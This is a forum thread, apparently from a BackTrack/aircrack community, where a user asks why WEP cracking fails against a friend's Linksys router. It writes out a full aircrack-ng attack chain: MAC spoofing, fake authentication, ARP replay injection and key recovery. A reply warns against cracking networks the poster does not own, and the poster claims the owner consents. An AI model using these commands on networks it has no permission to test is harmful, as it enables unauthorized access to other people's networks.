I am confused over this one. I have managed to break my homehub without any difficulty; however, when I was trying to emulate this at my friend's house, when I send the "aireplay-ng -0 1" etc. I get the authentication and association requests sent, however, I cannot get association. Therefore, is there any point using the aireplay-ng -3 attack to capture ARPs?
I don't understand it, I'm right next to the router yet no association; my method works, just not here.
Well, I am using a Toshiba Sat Pro A100 with an Orinoco gold 8470-wd and what is an older version of BT (as for some reason the newer ones detect my card but I cannot detect APs)
The commands are fairly basic:
Let's call my router "homehub" and its bssid 22:33:44:55:44:33 on channel 11
airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
Ctrl + C (so I can copy the AP)
aireplay-ng -1 0 -e homehub -a 22:33:44:55:44:33 -h 00:11:22:33:44:55 ath0
This is where I usually get association; however, my friend's Linksys WRT54GL (UK) doesn't give association.
airodump-ng -w homehub -c 11 ath0
aireplay-ng -3 -x 100 -n 100000 -b 22:33:44:55:44:33 -h 00:11:22:33:44:55 ath0
Once I get enough APs, IVs, whatever:
aircrack-ng -n 128 homehub-01.cap
That method worked fine on my router, any ideas?
sorry about the lack of info previously
"That method worked fine on my router, any ideas?
sorry about the lack of info previously"
So this one is not yours? If so... dash off!! READ FORUM RULES... DO NOT POST ON CRACKING NETS THAT DON'T BELONG TO YOU...
Watch your back, your packetz will belong to me soon... xD
BackTrack : Giving Machine Guns to Monkeys since 2006
Is the expressed consent of the router's owner unacceptable then? Although it may appear that I am attempting to crack someone else's router, I assure you this is genuine and the owner of the router in question is in fact beside me. I know better than to break the forum rules. If you are not satisfied with that I can give you all of the relevant serial numbers, stuff you can't find by cracking it. Do you have anything useful to add?
On the aircrack site there is a tutorial for clientless WEP cracking. In it there is a set of commands for picky access points. Furthermore, it also says "Tough Shit", sometimes the attack won't work. Gee, I hope that was useful.
Not exactly what I wanted to hear, but thanks anyway.
Had the same prob. Solved with the help of a big antenna and a strong wifi card... Remember that you have to reach the access point! This is not always possible even if you can catch the packets :-) After that I had success with the mentioned video tutorial...
That shouldn't be an issue since he has permission and is right next to it.